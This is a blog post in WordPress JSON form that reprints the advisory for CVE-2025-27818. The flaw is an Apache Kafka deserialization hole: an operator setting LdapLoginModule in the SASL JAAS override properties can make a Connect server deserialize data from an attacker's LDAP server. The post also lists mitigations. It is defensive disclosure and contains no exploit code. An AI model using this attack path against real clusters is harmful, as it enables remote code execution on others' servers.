{"id":64812,"date":"2025-06-10T13:32:07","date_gmt":"2025-06-10T10:02:07","guid":{"rendered":"https:\/\/afaghhosting.net\/blog\/cve-2025-27818-apache-kafka-ldaploginmodule-deserialization-vulnerability\/"},"modified":"2025-06-10T13:32:07","modified_gmt":"2025-06-10T10:02:07","slug":"cve-2025-27818-apache-kafka-ldaploginmodule-deserialization-vulnerability","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cve-2025-27818-apache-kafka-ldaploginmodule-deserialization-vulnerability\/","title":{"rendered":"CVE-2025-27818 &#8211; Apache Kafka LdapLoginModule Deserialization Vulnerability"},"content":{"rendered":"<p><strong>CVE ID : <\/strong>CVE-2025-27818<br \/>\n<br \/>\n<strong>Published : <\/strong> June 10, 2025, 8:15 a.m. | 44\u00a0minutes ago<br \/>\n<br \/>\n<strong>Description : <\/strong>A possible security vulnerability has been identified in Apache Kafka.<br \/>\nThis requires access to a alterConfig to the\u00a0cluster resource, or Kafka Connect worker, and the ability to create\/modify connectors on it with an arbitrary Kafka client SASL JAAS config<br \/>\nand a SASL-based security protocol, which has been possible on Kafka clusters since Apache Kafka 2.0.0 (Kafka Connect 2.3.0).<br \/>\nWhen configuring the broker via config file or AlterConfig command, or connector via the Kafka Kafka Connect REST API, an authenticated operator\u00a0can set the `sasl.jaas.config`<br \/>\nproperty for any of the connector&#8217;s Kafka clients to &#8220;com.sun.security.auth.module.LdapLoginModule&#8221;, which can be done via the<br \/>\n`producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties.<br \/>\nThis will allow the server to connect to the attacker&#8217;s LDAP server<br \/>\nand deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server.<br \/>\nAttacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.<\/p>\n<p>Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box<br \/>\nconfigurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector<br \/>\nclient override policy that permits them.<\/p>\n<p>Since Apache Kafka 3.9.1\/4.0.0, we have added a system property (&#8220;-Dorg.apache.kafka.disallowed.login.modules&#8221;) to disable the problematic login modules usage<br \/>\nin SASL JAAS configuration. Also by default &#8220;com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule&#8221; are disabled in Apache Kafka Connect 3.9.1\/4.0.0. <\/p>\n<p>We advise the Kafka users to validate connector configurations and only allow trusted LDAP configurations. Also examine connector dependencies for<br \/>\nvulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally,<br \/>\nin addition to leveraging the &#8220;org.apache.kafka.disallowed.login.modules&#8221; system property, Kafka Connect users can also implement their own connector<br \/>\nclient config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.<br \/>\n<br \/>\n<strong>Severity:<\/strong> 0.0 | NA<br \/>\n<br \/>\nVisit the link for more details, such as CVSS details, affected products, timeline, and more&#8230;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>CVE ID : CVE-2025-27818 Published : June 10, 2025, 8:15 a.m. | 44\u00a0minutes ago Description : A possible security vulnerability has been identified in Apache Kafka. This requires access to a alterConfig to the\u00a0cluster resource, or Kafka Connect worker, and the ability to create\/modify connectors on it with an arbitrary Kafka client SASL JAAS config &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-64812","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/64812","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=64812"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/64812\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=64812"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=64812"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=64812"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}